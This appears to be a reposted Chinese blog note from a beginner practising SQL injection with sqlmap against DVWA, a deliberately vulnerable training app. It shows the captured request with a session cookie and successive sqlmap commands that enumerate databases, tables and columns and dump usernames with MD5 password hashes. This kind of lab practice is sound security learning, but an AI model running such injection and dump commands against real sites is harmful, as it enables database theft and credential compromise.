zoukankan      html  css  js  c++  java
  • sqlmap dvwa SQL Injection使用小记

    刚刚开始学习sql injection,初步使用sqlmap,使用


    GET http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#  HTTP/1.1

    Host=www.dvssc.com
    User-Agent=Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
    Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language=en-us,en;q=0.5
    Accept-Encoding=gzip, deflate
    Connection=keep-alive
    Referer=http://www.dvssc.com/dvwa/vulnerabilities/sqli/
    Cookie=security=low; PHPSESSID=adc4ofjlnsaogmqd8emldhhlf5


    我们可以在命令行中运行下面命令列出数据库的名字

    ./sqlmap.py -u "http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=adc4ofjlnsaogmqd8emldhhlf5"  --dbs

    可以看到如下结果:

    [12:05:19] [INFO] fetching database names
    available databases [2]:
    [*] dvwa
    [*] information_schema
    


    可以看到列出两个数据库的名,继续命令, 列出dvwa数据库的表名

    ./sqlmap.py -u "http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=adc4ofjlnsaogmqd8emldhhlf5"  -D dvwa --tables

    [12:08:11] [INFO] fetching tables for database: 'dvwa'
    Database: dvwa
    [2 tables]
    +-----------+
    | guestbook |
    | users     |
    +-----------+
    


    我们可以查看users这个表中有哪些列:

    ./sqlmap.py -u "http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=adc4ofjlnsaogmqd8emldhhlf5"  -D dvwa -T users --column

    [12:10:14] [INFO] fetching columns for table 'users' in database 'dvwa'
    Database: dvwa
    Table: users
    [6 columns]
    +------------+-------------+
    | Column     | Type        |
    +------------+-------------+
    | user       | varchar(15) |
    | avatar     | varchar(70) |
    | first_name | varchar(15) |
    | last_name  | varchar(15) |
    | password   | varchar(32) |
    | user_id    | int(6)      |
    +------------+-------------+
    

    查看指定的列的值:

    ./sqlmap.py -u "http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=adc4ofjlnsaogmqd8emldhhlf5"  -D dvwa -T users -C user,password,user_id --dump

    Database: dvwa
    Table: users
    [5 entries]
    +---------+---------+----------------------------------+
    | user_id | user    | password                         |
    +---------+---------+----------------------------------+
    | 1       | admin   | 21232f297a57a5a743894a0e4a801fc3 |
    | 2       | gordonb | e99a18c428cb38d5f260853678922e03 |
    | 3       | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b |
    | 4       | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 |
    | 5       | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 |
    +---------+---------+----------------------------------+
    


    可以看出已经dump出来的用户名和相应的密码等信息。

  • 相关阅读:
    cppPrimer学习18th
    cppPrimer学习17th
    cppPrimer学习15th
    常用网站记录
    cppPrimer学习16th
    关于nfs内网穿透frp/nps的问题记录
    unp[unix 网络环境编程]学习 vscode环境搭建
    cppPrimer学习14th
    cppPrimer学习14th
    cppPrimer学习13th
  • 原文地址:https://www.cnblogs.com/keanuyaoo/p/3395434.html
Copyright © 2011-2022 走看看